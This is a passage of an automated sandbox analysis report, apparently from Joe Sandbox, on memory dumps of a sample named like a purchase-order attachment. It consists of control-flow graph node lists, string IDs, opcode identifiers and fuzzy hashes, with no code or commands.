27374f0-27374f3 630->637 638 27374ad-27374b2 630->638 631->621 640 273722a-2737233 632->640 633->640 641 2737472-2737476 634->641 642 273744f-2737457 634->642 635->591 637->635 647 27374f5-27374fa 637->647 638->635 648 27374b4 638->648 649 2737292-2737294 639->649 650 2737296-2737298 639->650 644 2737246-273726e 640->644 645 2737235-2737240 640->645 641->606 646 2737478-273747e 641->646 642->591 643 273745d-273746c 642->643 643->596 643->641 672 2737362-2737398 644->672 673 2737274-2737279 644->673 645->621 645->644 646->588 646->606 647->589 647->615 653 27374bb-27374c0 648->653 651 27372a2-27372b9 649->651 650->651 665 27372e4-273730b 651->665 666 27372bb-27372d4 651->666 658 27374e2-27374e4 653->658 659 27374c2-27374c4 653->659 657->618 658->635 663 27374e6-27374e9 658->663 660 27374d3-27374d9 659->660 661 27374c6-27374cb 659->661 660->591 664 27374db-27374e0 660->664 661->660 663->637 664->658 668 27374b6-27374b9 664->668 665->635 676 2737311-2737314 665->676 666->672 677 27372da-27372df 666->677 668->635 668->653 680 27373a5-27373ad 672->680 681 273739a-273739e 672->681 673->672 676->635 679 273731a-2737343 676->679 677->672 679->672 696 2737345-273734a 679->696 680->635 682 27373b3-27373b8 680->682 683 27373a0-27373a3 681->683 684 27373bd-27373c1 681->684 682->621 683->680 683->684 686 27373c3-27373c9 684->686 687 27373e0-27373e4 684->687 686->687 688 27373cb-27373d3 686->688 689 27373e6-27373ec 687->689 690 27373ee-273740d call 27376f1 687->690 688->635 692 27373d9-27373de 688->692 689->690 693 2737413-2737417 689->693 690->693 692->621 693->621 694 2737419-2737435 693->694 694->621 696->672 697->569 698->569 699->569 700->558 701->558 702->558
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                              • API String ID: 0-879173519
                                                                                                                                              • Opcode ID: f4ffc2d73eb8d37de0f8e53577333d8fc01f2df03a8f8330ce1c123d8d3c3c01
                                                                                                                                              • Instruction ID: 4b5286b1298d6432c5f36af36a5e73794153f21dc89e164d667a86f20d1ca539
                                                                                                                                              • Opcode Fuzzy Hash: f4ffc2d73eb8d37de0f8e53577333d8fc01f2df03a8f8330ce1c123d8d3c3c01
                                                                                                                                              • Instruction Fuzzy Hash: 67125FB1A00219DFCB1ACF68C884AADFBF2FF49314F158469E845AB262D731ED41CB51
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$4'^q
                                                                                                                                              • API String ID: 0-273632683
                                                                                                                                              • Opcode ID: 2c5235fc382b76ba389942d058c9e0a12cdf73097d44e32e7733a66280affcd4
                                                                                                                                              • Instruction ID: 57a65d0bd9050566c19cc16e2387ffbfe7c79808a025e5fcafc1d11a2abd3ff9
                                                                                                                                              • Opcode Fuzzy Hash: 2c5235fc382b76ba389942d058c9e0a12cdf73097d44e32e7733a66280affcd4
                                                                                                                                              • Instruction Fuzzy Hash: FA82AF31A00209DFCB16CFA8C585AAEBBF2FF88314F158559E485AB366D731ED41CB54
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$Hbq
                                                                                                                                              • API String ID: 0-662517225
                                                                                                                                              • Opcode ID: be048aab96d82b55152d4e215256f57164bbf38bc136f8c891265bfef4745812
                                                                                                                                              • Instruction ID: acb53afe517561d700f8047336d266bb6465e4b232ac8b78dba86043a5f19761
                                                                                                                                              • Opcode Fuzzy Hash: be048aab96d82b55152d4e215256f57164bbf38bc136f8c891265bfef4745812
                                                                                                                                              • Instruction Fuzzy Hash: CA129D70A002199FDB19DF69C854BAEBBFAFF88304F148569E405EB396DB309D41CB94
                                                                                                                                              APIs
                                                                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 05357D68
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4176791008.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_5350000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                              • Opcode ID: 3a2c84f24da5e7614b4f1dd29232e9e8a68c23a41cac4f78c09d055ad3ccaff1
                                                                                                                                              • Instruction ID: d1db01296f47636a078421a64f04d258981571685d76f1b5534eddf57d5a22ca
                                                                                                                                              • Opcode Fuzzy Hash: 3a2c84f24da5e7614b4f1dd29232e9e8a68c23a41cac4f78c09d055ad3ccaff1
                                                                                                                                              • Instruction Fuzzy Hash: 00E1B174E01218CFEB24DFA5C944B9DBBB2BF89304F2081A9D809BB395DB755A85CF10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cb0abff6740b5079b43c82f10f0a2d3fe3b74a37ff91834cf2d08d74d7d768c0
                                                                                                                                              • Instruction ID: 8a31577a5242967c2ef700af9df4b76f2a29b2c6ba733c9ed5874546011f4e15
                                                                                                                                              • Opcode Fuzzy Hash: cb0abff6740b5079b43c82f10f0a2d3fe3b74a37ff91834cf2d08d74d7d768c0
                                                                                                                                              • Instruction Fuzzy Hash: FF51A374E00308DFDB19DFAAD584A9DBBB2BF88300F208429E815AB365DB319945CF54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3c704c773b46b895e312ee74ebe85ea8c3397437f4a0d3e1502d4d16faf46431
                                                                                                                                              • Instruction ID: 09d19428c330fa383d8288779925b930b5feeb71e1da917e1be7c3f7f129cf12
                                                                                                                                              • Opcode Fuzzy Hash: 3c704c773b46b895e312ee74ebe85ea8c3397437f4a0d3e1502d4d16faf46431
                                                                                                                                              • Instruction Fuzzy Hash: 6B51B474E00208DFDB19DFAAD994A9DBBB2FF88300F248429E815BB365DB319845CF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 27376f1-27376f2 1 27376f6-2737725 0->1 2 27376f4 0->2 3 2737b54-2737b58 1->3 4 273772b-273774e 1->4 2->1 5 2737b71-2737b7f 3->5 6 2737b5a-2737b6e 3->6 13 2737754-2737761 4->13 14 27377fc-2737800 4->14 11 2737b81-2737b96 5->11 12 2737bf0-2737c05 5->12 22 2737b98-2737b9b 11->22 23 2737b9d-2737baa 11->23 24 2737c07-2737c0a 12->24 25 2737c0c-2737c19 12->25 28 2737763-273776e 13->28 29 2737770 13->29 15 2737802-2737810 14->15 16 2737848-2737851 14->16 15->16 34 2737812-273782d 15->34 19 2737c67 16->19 20 2737857-2737861 16->20 35 2737c6c-2737c7a 19->35 20->3 26 2737867-2737870 20->26 30 2737bac-2737bed 22->30 23->30 31 2737c1b-2737c56 24->31 25->31 32 2737872-2737877 26->32 33 273787f-273788b 26->33 36 2737772-2737774 28->36 29->36 82 2737c5d-2737c64 31->82 32->33 33->35 41 2737891-2737897 33->41 63 273783b 34->63 64 273782f-2737839 34->64 48 2737c7e-2737c86 35->48 49 2737c7c 35->49 36->14 43 273777a-27377dc 36->43 44 2737b3e-2737b42 41->44 45 273789d-27378ad 41->45 94 27377e2-27377f9 43->94 95 27377de 43->95 44->19 51 2737b48-2737b4e 44->51 61 27378c1-27378c3 45->61 62 27378af-27378bf 45->62 54 2737c8a-2737c9c 48->54 55 2737c88-2737c89 48->55 49->48 51->3 51->26 69 2737cb5-2737cbc 54->69 70 2737c9e-2737cb4 54->70 55->54 66 27378c6-27378cc 61->66 62->66 67 273783d-273783f 63->67 64->67 66->44 75 27378d2-27378e1 66->75 67->16 76 2737841 67->76 77 27378e7 75->77 78 273798f-27379ba call 2737538 * 2 75->78 76->16 79 27378ea-27378fb 77->79 96 27379c0-27379c4 78->96 97 2737aa4-2737abe 78->97 79->35 84 2737901-2737913 79->84 84->35 87 2737919-2737931 84->87 150 2737933 call 27380c9 87->150 151 2737933 call 27380d8 87->151 90 2737939-2737949 90->44 93 273794f-2737952 90->93 98 2737954-273795a 93->98 99 273795c-273795f 93->99 94->14 95->94 96->44 100 27379ca-27379ce 96->100 97->3 119 2737ac4-2737ac8 97->119 98->99 101 2737965-2737968 98->101 99->19 99->101 104 27379d0-27379dd 100->104 105 27379f6-27379fc 100->105 106 2737970-2737973 101->106 107 273796a-273796e 101->107 122 27379df-27379ea 104->122 123 27379ec 104->123 109 2737a37-2737a3d 105->109 110 27379fe-2737a02 105->110 106->19 108 2737979-273797d 106->108 107->106 107->108 108->19 116 2737983-2737989 108->116 113 2737a49-2737a4f 109->113 114 2737a3f-2737a43 109->114 110->109 111 2737a04-2737a0d 110->111 117 2737a0f-2737a14 111->117 118 2737a1c-2737a32 111->118 120 2737a51-2737a55 113->120 121 2737a5b-2737a5d 113->121 114->82 114->113 116->78 116->79 117->118 118->44 124 2737b04-2737b08 119->124 125 2737aca-2737ad4 call 27363e0 119->125 120->44 120->121 126 2737a92-2737a94 121->126 127 2737a5f-2737a68 121->127 128 27379ee-27379f0 122->128 123->128 124->82 131 2737b0e-2737b12 124->131 125->124 139 2737ad6-2737aeb 125->139 126->44 129 2737a9a-2737aa1 126->129 134 2737a77-2737a8d 127->134 135 2737a6a-2737a6f 127->135 128->44 128->105 131->82 136 2737b18-2737b25 131->136 134->44 135->134 141 2737b27-2737b32 136->141 142 2737b34 136->142 139->124 147 2737aed-2737b02 139->147 144 2737b36-2737b38 141->144 142->144 144->44 144->82 147->3 147->124 150->90 151->90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                              • API String ID: 0-1932283790
                                                                                                                                              • Opcode ID: 2b0b7016b6bf3882cf0c476c5042a3d0f2daecd824c09fcd8f2682739098fc4b
                                                                                                                                              • Instruction ID: 888e1674206d6b06651aef3fd8ed87824b5e45d98ea083ff1ad6f8e5ad54d18a
                                                                                                                                              • Opcode Fuzzy Hash: 2b0b7016b6bf3882cf0c476c5042a3d0f2daecd824c09fcd8f2682739098fc4b
                                                                                                                                              • Instruction Fuzzy Hash: 62125970A002488FCB1ACF69D984AAEFBF2FF49314F1485A9E4199B362D731ED41CB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1252 2735f38-2735f5a 1253 2735f70-2735f7b 1252->1253 1254 2735f5c-2735f60 1252->1254 1257 2736023-273604f 1253->1257 1258 2735f81-2735f83 1253->1258 1255 2735f62-2735f6e 1254->1255 1256 2735f88-2735f8f 1254->1256 1255->1253 1255->1256 1260 2735f91-2735f98 1256->1260 1261 2735faf-2735fb8 1256->1261 1264 2736056-27360ae 1257->1264 1259 273601b-2736020 1258->1259 1260->1261 1262 2735f9a-2735fa5 1260->1262 1334 2735fba call 2735f2b 1261->1334 1335 2735fba call 2735f38 1261->1335 1262->1264 1265 2735fab-2735fad 1262->1265 1284 27360b0-27360b6 1264->1284 1285 27360bd-27360cf 1264->1285 1265->1259 1266 2735fc0-2735fc2 1267 2735fc4-2735fc8 1266->1267 1268 2735fca-2735fd2 1266->1268 1267->1268 1271 2735fe5-2736004 call 27369a0 1267->1271 1272 2735fe1-2735fe3 1268->1272 1273 2735fd4-2735fd9 1268->1273 1278 2736006-273600f 1271->1278 1279 2736019 1271->1279 1272->1259 1273->1272 1332 2736011 call 273aef0 1278->1332 1333 2736011 call 273afad 1278->1333 1279->1259 1281 2736017 1281->1259 1284->1285 1287 2736163-2736165 1285->1287 1288 27360d5-27360d9 1285->1288 1337 2736167 call 27362f0 1287->1337 1338 2736167 call 2736300 1287->1338 1289 27360db-27360e7 1288->1289 1290 27360e9-27360f6 1288->1290 1298 27360f8-2736102 1289->1298 1290->1298 1291 273616d-2736173 1292 2736175-273617b 1291->1292 1293 273617f-2736186 1291->1293 1296 27361e1-2736240 1292->1296 1297 273617d 1292->1297 1312 2736247-2736262 1296->1312 1297->1293 1301 2736104-2736113 1298->1301 1302 273612f-2736133 1298->1302 1310 2736123-273612d 1301->1310 1311 2736115-273611c 1301->1311 1303 2736135-273613b 1302->1303 1304 273613f-2736143 1302->1304 1307 2736189-27361da 1303->1307 1308 273613d 1303->1308 1304->1293 1309 2736145-2736149 1304->1309 1307->1296 1308->1293 1309->1312 1313 273614f-2736161 1309->1313 1310->1302 1311->1310 1313->1293 1332->1281 1333->1281 1334->1266 1335->1266 1337->1291 1338->1291
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Hbq$Hbq
                                                                                                                                              • API String ID: 0-4258043069
                                                                                                                                              • Opcode ID: 85660459b544cd4862d3cff709f9f40668eb858a34b818bc0e4e18092e126ed9
                                                                                                                                              • Instruction ID: 7dd416324b731accc48cd3619d69af3b8ae9b0674ab31213fc269521bdacf32e
                                                                                                                                              • Opcode Fuzzy Hash: 85660459b544cd4862d3cff709f9f40668eb858a34b818bc0e4e18092e126ed9
                                                                                                                                              • Instruction Fuzzy Hash: A291DC307042559FDB169F388854B7ABBA6FF89304F148969E8468B396CB78C802CB95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1339 2736498-27364a5 1340 27364a7-27364ab 1339->1340 1341 27364ad-27364af 1339->1341 1340->1341 1342 27364b4-27364bf 1340->1342 1343 27366c0-27366c7 1341->1343 1344 27364c5-27364cc 1342->1344 1345 27366c8 1342->1345 1346 27364d2-27364e1 1344->1346 1347 2736661-2736667 1344->1347 1350 27366cd-27366d9 1345->1350 1346->1350 1351 27364e7-27364f6 1346->1351 1348 2736669-273666b 1347->1348 1349 273666d-2736671 1347->1349 1348->1343 1352 2736673-2736679 1349->1352 1353 27366be 1349->1353 1360 27366de-27366e0 1350->1360 1361 27366dc 1350->1361 1357 273650b-273650e 1351->1357 1358 27364f8-27364fb 1351->1358 1352->1345 1355 273667b-273667e 1352->1355 1353->1343 1355->1345 1359 2736680-2736695 1355->1359 1362 273651a-2736520 1357->1362 1364 2736510-2736513 1357->1364 1358->1362 1363 27364fd-2736500 1358->1363 1381 2736697-273669d 1359->1381 1382 27366b9-27366bc 1359->1382 1365 27366e2 1360->1365 1366 2736718-273671a 1360->1366 1361->1360 1374 2736522-2736528 1362->1374 1375 2736538-2736555 1362->1375 1369 2736601-2736607 1363->1369 1370 2736506 1363->1370 1371 2736566-273656c 1364->1371 1372 2736515 1364->1372 1376 27366e6 1365->1376 1377 27366e4-27366e5 1365->1377 1367 273672f-2736736 1366->1367 1368 273671c-273672e 1366->1368 1387 2736609-273660f 1369->1387 1388 273661f-2736629 1369->1388 1378 273662c-2736639 1370->1378 1379 2736584-2736596 1371->1379 1380 273656e-2736574 1371->1380 1372->1378 1383 273652a 1374->1383 1384 273652c-2736536 1374->1384 1415 273655e-2736561 1375->1415 1385 27366ea-2736705 1376->1385 1386 27366e8-27366e9 1376->1386 1377->1376 1406 273663b-273663f 1378->1406 1407 273664d-273664f 1378->1407 1408 27365a6-27365c9 1379->1408 1409 2736598-27365a4 1379->1409 1392 2736576 1380->1392 1393 2736578-2736582 1380->1393 1395 27366af-27366b2 1381->1395 1396 273669f-27366ad 1381->1396 1382->1343 1383->1375 1384->1375 1410 2736707-273670c 1385->1410 1411 273670e-2736712 1385->1411 1386->1385 1389 2736613-273661d 1387->1389 1390 2736611 1387->1390 1388->1378 1389->1388 1390->1388 1392->1379 1393->1379 1395->1345 1401 27366b4-27366b7 1395->1401 1396->1345 1396->1395 1401->1381 1401->1382 1406->1407 1413 2736641-2736645 1406->1413 1414 2736653-2736656 1407->1414 1408->1345 1422 27365cf-27365d2 1408->1422 1420 27365f1-27365ff 1409->1420 1410->1366 1411->1366 1413->1345 1416 273664b 1413->1416 1414->1345 1417 2736658-273665b 1414->1417 1415->1378 1416->1414 1417->1346 1417->1347 1420->1378 1422->1345 1424 27365d8-27365ea 1422->1424 1424->1420
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,bq$,bq
                                                                                                                                              • API String ID: 0-2699258169
                                                                                                                                              • Opcode ID: f0bf7b84c452d6abb7f3a2cc20137f94c14cf91057c8cbccc678522487f96d36
                                                                                                                                              • Instruction ID: 1cb8fd204ca41db2cd99fabf327abf60ce00e4e724ba6273eb8b4daf9e4fb925
                                                                                                                                              • Opcode Fuzzy Hash: f0bf7b84c452d6abb7f3a2cc20137f94c14cf91057c8cbccc678522487f96d36
                                                                                                                                              • Instruction Fuzzy Hash: E4910330B00515EFCB16CF68C884A6ABBFAFF89354B148169D405EB366CB31EC41CB65

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1527 2739c30-2739c51 1571 2739c53 call 2739c23 1527->1571 1572 2739c53 call 2739c30 1527->1572 1528 2739c59-2739c60 1529 2739c62-2739c67 1528->1529 1530 2739c6c-2739c8c 1528->1530 1531 2739d35-2739d3c 1529->1531 1533 2739cc7-2739cc9 1530->1533 1534 2739c8e-2739c90 1530->1534 1537 2739d30 1533->1537 1538 2739ccb-2739cd1 1533->1538 1535 2739c92-2739c97 1534->1535 1536 2739c9f-2739ca6 1534->1536 1535->1536 1539 2739d3f-2739d4a 1536->1539 1540 2739cac-2739cc5 1536->1540 1537->1531 1538->1537 1541 2739cd3-2739cee 1538->1541 1547 2739d4e-2739d52 1539->1547 1548 2739d4c 1539->1548 1540->1531 1545 2739cf0-2739cf2 1541->1545 1546 2739d25-2739d27 1541->1546 1551 2739d01-2739d08 1545->1551 1552 2739cf4-2739cf9 1545->1552 1546->1537 1553 2739d29-2739d2e 1546->1553 1549 2739d56 1547->1549 1550 2739d54 1547->1550 1548->1547 1554 2739d5a-2739d6b call 2739620 1549->1554 1555 2739d58-2739d59 1549->1555 1550->1549 1551->1539 1556 2739d0a-2739d23 1551->1556 1552->1551 1553->1531 1560 2739d79-2739d82 call 2739620 1554->1560 1561 2739d6d-2739d77 1554->1561 1555->1554 1556->1531 1565 2739d90-2739d99 1560->1565 1566 2739d84-2739d8e 1560->1566 1561->1560 1568 2739da4-2739dcd 1565->1568 1566->1565 1571->1528 1572->1528
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                              • Opcode ID: 6e6ffbba6764c287c45fc4c2a7140c0ea59513889ba8113d3b709ca556d18fc2
                                                                                                                                              • Instruction ID: 1053ef6c4adec666d9b66cb2100c1d0fc0c0b86f2284ef5fdb71745e703686d9
                                                                                                                                              • Opcode Fuzzy Hash: 6e6ffbba6764c287c45fc4c2a7140c0ea59513889ba8113d3b709ca556d18fc2
                                                                                                                                              • Instruction Fuzzy Hash: 2D51B530710254DFDB02DF6AD884B6ABBE6EF89310F048466EA09CB356DBB1DC42C761
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Xbq$Xbq
                                                                                                                                              • API String ID: 0-1243427068
                                                                                                                                              • Opcode ID: 4b1c3f415d4a3cd02a76b1a9eb258f703b4005ba90d98a88c20403312a6c705c
                                                                                                                                              • Instruction ID: f549bbb7fa765ef0382bfe35380dd2b1c4f580fb5e83252e6f6e29a30ef25838
                                                                                                                                              • Opcode Fuzzy Hash: 4b1c3f415d4a3cd02a76b1a9eb258f703b4005ba90d98a88c20403312a6c705c
                                                                                                                                              • Instruction Fuzzy Hash: C2315A317143648BDF3E467A499437EAAA6ABC4300F0445BEE806D7396DBB5CC44C7E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                              • Opcode ID: 0c03d62b9f7a0dc8ec217662f2661a0d657c89d0943b5f0a717ef74b60325934
                                                                                                                                              • Instruction ID: f0b93e820c53270e4b00ab359a7ded36874d34ee6b9e738d5f2051aef59c7190
                                                                                                                                              • Opcode Fuzzy Hash: 0c03d62b9f7a0dc8ec217662f2661a0d657c89d0943b5f0a717ef74b60325934
                                                                                                                                              • Instruction Fuzzy Hash: 7931C3303442538FCB278B38889463E7B67AB86700F14486AF042DB293DB79CC41C756
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LR^q
                                                                                                                                              • API String ID: 0-2625958711
                                                                                                                                              • Opcode ID: 1fa227edf101738e107f708a47681c3c4fbfc0151d81cf612759d205f3c52a85
                                                                                                                                              • Instruction ID: 7a75d92567a204b2a91a49f6c9327bd4bc8b8a48d066be79746e29e3c517808a
                                                                                                                                              • Opcode Fuzzy Hash: 1fa227edf101738e107f708a47681c3c4fbfc0151d81cf612759d205f3c52a85
                                                                                                                                              • Instruction Fuzzy Hash: D252FE74A14319CFCB55EF24ED94A9DBBB2FB48301F1085A5D409AB3A8DB706E85CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LR^q
                                                                                                                                              • API String ID: 0-2625958711
                                                                                                                                              • Opcode ID: 9b325b5467d317eb2f408833dd4c52f9c395d01bb4b8aca46f8c54d45f3cb8d3
                                                                                                                                              • Instruction ID: fdb8e98cf6d10c241cec3d47a7973576096cb44e890e08c2b1d9bfbee05b6d09
                                                                                                                                              • Opcode Fuzzy Hash: 9b325b5467d317eb2f408833dd4c52f9c395d01bb4b8aca46f8c54d45f3cb8d3
                                                                                                                                              • Instruction Fuzzy Hash: 2B520E74A04319CFCB55EF24ED95A9DBBB2FB48301F1085A5D409AB3A8DB706E85CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q
                                                                                                                                              • API String ID: 0-74704288
                                                                                                                                              • Opcode ID: e5bb82417ccf6d249867ff6530330c1e992212976e63ba369b144ed60fbd6d58
                                                                                                                                              • Instruction ID: e4747e8f7a6dbbaab1ad1a82b65a84bd0ca0585dadd369ea4334dfe57df68cad
                                                                                                                                              • Opcode Fuzzy Hash: e5bb82417ccf6d249867ff6530330c1e992212976e63ba369b144ed60fbd6d58
                                                                                                                                              • Instruction Fuzzy Hash: 7371C571B002158FCB16DF68D884AAEBBF6FF89314B148569E515D73A6DB31DC02CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8c0f9e8db5767bb1eb4483ab329835c96982788df0de8e39ecb7f2750a2f8748
                                                                                                                                              • Instruction ID: 1b46f0974c823fc5dd59ba1259ac0da334e3bdc34b95537ef8f61d16ab9165a3
                                                                                                                                              • Opcode Fuzzy Hash: 8c0f9e8db5767bb1eb4483ab329835c96982788df0de8e39ecb7f2750a2f8748
                                                                                                                                              • Instruction Fuzzy Hash: F512A8748A17668FA2412F30E6AC12EFA60FB1F363704EC45F10FC1855DFB516A98A66
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: de16d9c84a17c89abf0b6a86564fee5262f8d46fcfb8db67b60506fbba3d20e8
                                                                                                                                              • Instruction ID: e309105755649422348641f2c9af75245c7c00994991d57f03e814d048c03ccb
                                                                                                                                              • Opcode Fuzzy Hash: de16d9c84a17c89abf0b6a86564fee5262f8d46fcfb8db67b60506fbba3d20e8
                                                                                                                                              • Instruction Fuzzy Hash: 0512A8748A17678FA2412F30E6BC12EFA61FB1F363704EC41F10FC18459FB516A98A66
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
